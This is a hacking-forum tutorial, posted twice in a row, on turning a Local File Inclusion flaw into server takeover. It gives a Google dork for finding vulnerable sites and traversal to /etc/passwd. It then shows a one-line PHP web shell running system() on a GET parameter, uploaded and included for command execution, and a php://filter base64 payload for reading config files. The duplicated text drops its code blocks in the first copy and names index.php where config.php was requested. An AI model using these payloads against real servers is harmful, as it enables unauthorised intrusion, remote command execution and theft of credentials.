BadB
Professional
- Messages
- 2,468
- Reaction score
- 2,471
- Points
- 113
Hello hacker, finally I have some free time, which I devoted to this article. Today we will learn how to use the LFI vulnerability to gain control over a site. Go!
Local File Inclusion - Take over the server.
Simply put, this is a vulnerability of opening files from the server + insufficient filtering, which allows you to open an arbitrary file.
The dork for finding a vulnerability looks something like this:
We will now test the possibility of this vulnerability. To do this, we change the URL in this way:
The above is an attempt to display the contents of the / etc / passwd file on a UNIX / Linux based system. Accordingly, we are trying to break through to the server. And if we see something like this, then the likelihood of vulnerability increases significantly:
It's time to get full access to the server. To do this, we will turn the LFI vulnerability into Code Execution.
If there is a file upload form and you can upload php files - or bypass filename security checks - then you can include your uploaded file with an LFI vulnerability if you know the path to the uploaded files. Let's take a look at an example.
We create a file named exploit.php. The content of the file is a regular php script:
In this example, we will use the task of downloading DVWA files:
As we can see, the web application tells us about the download path.
If the path to the file is not specified, we should try to brute force the path or use the standard directories used by popular CMS engines.
As you have seen, LFI attacks do not limit our capabilities to just reading files.
If we think about it, we can cleverly get a remote shell for the vulnerable server.
Of course, a misconfigured server - that is, incorrect file permissions - will always help us achieve this goal.
www.example.com/open.php?file= php: //filter/read=convert.base64-encode/resource=../../config.php
Here we can see the contents of the index.php file.
This will return the contents of the index.php file instead of including it, which is the same as doing it. The output will be in Base64 and hence you will need to decode it.
That's all, good luck!
Local File Inclusion - Take over the server.
LFI is the ability to use and execute local files on the server side. The vulnerability allows a remote user to access arbitrary files on the server using a specially crafted request, including those containing confidential information.
Simply put, this is a vulnerability of opening files from the server + insufficient filtering, which allows you to open an arbitrary file.
Using Google, of course!
The dork for finding a vulnerability looks something like this:
Code:
inurl: page?=.phpWe will now test the possibility of this vulnerability. To do this, we change the URL in this way:
The above is an attempt to display the contents of the / etc / passwd file on a UNIX / Linux based system. Accordingly, we are trying to break through to the server. And if we see something like this, then the likelihood of vulnerability increases significantly:
It's time to get full access to the server. To do this, we will turn the LFI vulnerability into Code Execution.
If there is a file upload form and you can upload php files - or bypass filename security checks - then you can include your uploaded file with an LFI vulnerability if you know the path to the uploaded files. Let's take a look at an example.
We create a file named exploit.php. The content of the file is a regular php script:
Code:
<?php
system($_GET[‘cmd’]);
?>In this example, we will use the task of downloading DVWA files:
As we can see, the web application tells us about the download path.
If the path to the file is not specified, we should try to brute force the path or use the standard directories used by popular CMS engines.
As you have seen, LFI attacks do not limit our capabilities to just reading files.
If we think about it, we can cleverly get a remote shell for the vulnerable server.
Of course, a misconfigured server - that is, incorrect file permissions - will always help us achieve this goal.
With LFI, you can view the contents of any PHP file you want. You can do this by executing " php: //filter/read=convert.base64-encode/resource=FILETOREAD " after the file parameter in the URL. Here's an example:
www.example.com/open.php?file= php: //filter/read=convert.base64-encode/resource=../../config.php
Here we can see the contents of the index.php file.
This will return the contents of the index.php file instead of including it, which is the same as doing it. The output will be in Base64 and hence you will need to decode it.
That's all, good luck!
